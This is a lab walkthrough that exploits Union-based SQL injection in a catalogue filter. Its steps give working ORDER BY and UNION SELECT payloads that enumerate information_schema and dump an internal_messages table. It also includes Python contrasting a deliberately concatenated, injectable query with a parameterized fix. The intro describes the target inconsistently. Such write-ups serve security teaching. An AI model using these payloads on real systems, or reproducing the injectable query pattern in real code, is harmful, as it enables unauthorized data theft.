
Infinity - SQL Injection - Catalogue

A walkthrough of exploiting a Union-based SQL Injection vulnerability in a broken search feature on the Infinity platform. By identifying the correct number of columns and injecting into a POST parameter, we successfully dumped sensitive data from the database.

Overview

A walkthrough of exploiting a Union-based SQL Injection vulnerability in a product catalogue filter on the Infinity platform. By using ORDER BY to determine the column count and UNION SELECT to enumerate the internal_messages table, we successfully retrieved hidden messages from the database.

Vulnerability: Union-based SQL Injection
Parameter: POST body — search field
Database: MariaDB (MySQL)


Step 1: Identify the Input Field

Open the challenge and locate the filter by category input field.


Step 2: Test for SQL Injection

Injecting a single quote (') or a double quote (") produced no visible response from the application, so I moved on to a UNION-based injection.

First, assume the backend query looks something like this:

SELECT id, name, price FROM products WHERE category = 'electronics'-- -';

-- the "-- -" sequence turns everything after it into a comment, including the closing quote


Step 3: Determine Number of Columns

Use ORDER BY to find how many columns the original query returns. Increment the index until the results stop appearing.

1 column:  electronics' order by 1-- -

2 columns: electronics' order by 2-- -

3 columns: electronics' order by 3-- - → success. Trying order by 4 fails.

That makes sense: the query returns 3 columns.

Step 4: Enumerate the Database

First I needed to know which column is reflected in the page when I inject into it; it turned out to be column 2.

With 3 columns confirmed, extract table names from information_schema.

' UNION SELECT 1,table_name,3 FROM information_schema.tables;-- -

The enumeration returned many table names; the interesting one was internal_messages.

Step 5: Dump Column Names

' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='internal_messages';-- -

Columns found: id, message


Step 6: Dump the Data

' UNION SELECT 1,message,3 FROM internal_messages;-- -

Successfully retrieved the contents of the internal_messages table.
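To show why the filter above was exploitable and how the fix looks, here is an added example (not code from the challenge or this writeup) that rebuilds the catalogue filter two ways over a constructed in-memory SQLite database: once with string concatenation, once with a bound parameter. It assumes the schema and data below (constructed to mirror the writeup; the real target was MariaDB, so information_schema is not available and the trailing ";" is dropped from the payloads because the SQLite driver refuses multi-statement text).

```python
import sqlite3

# Constructed sample schema mirroring the writeup's tables.
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, price REAL, category TEXT);
INSERT INTO products VALUES (1, 'laptop', 999.0, 'electronics'),
                            (2, 'phone', 499.0, 'electronics'),
                            (3, 'desk', 150.0, 'furniture');
CREATE TABLE internal_messages (id INTEGER, message TEXT);
INSERT INTO internal_messages VALUES (1, 'flag{constructed-sample}');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def filter_vulnerable(conn, category):
    # String concatenation: the category value becomes part of the SQL text,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    sql = f"SELECT id, name, price FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def filter_hardened(conn, category):
    # Bound parameter: the value is sent separately and is never parsed as SQL,
    # so the same payload is just a category name that matches nothing.
    sql = "SELECT id, name, price FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def order_by_probe(conn, n):
    # Step 3 probe: ORDER BY n errors once n exceeds the column count,
    # which is how the writeup settled on 3 columns.
    try:
        filter_vulnerable(conn, f"electronics' order by {n}-- -")
        return True
    except sqlite3.OperationalError:
        return False


def demo():
    conn = connect()
    # Same UNION payload as Step 6 (column 2 is the reflected one).
    payload = "' UNION SELECT 1,message,3 FROM internal_messages-- -"
    return {
        "vuln_benign": filter_vulnerable(conn, "electronics"),
        "vuln_payload": filter_vulnerable(conn, payload),
        "safe_benign": filter_hardened(conn, "electronics"),
        "safe_payload": filter_hardened(conn, payload),
    }
```

The hardened version also removes the ORDER BY signal: a bound value cannot change the statement's column count, so the probe has nothing to measure.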


Key Takeaways

  • Column count detection is the first real step in any UNION-based attack; don’t skip it.
  • Reflected column positions tell you exactly where your output will appear — target those.
  • information_schema is your map — tables first, then columns, then data.

Happy Hacking!

Follow me: LinkedIn · X

This post is licensed under CC BY 4.0 by the author.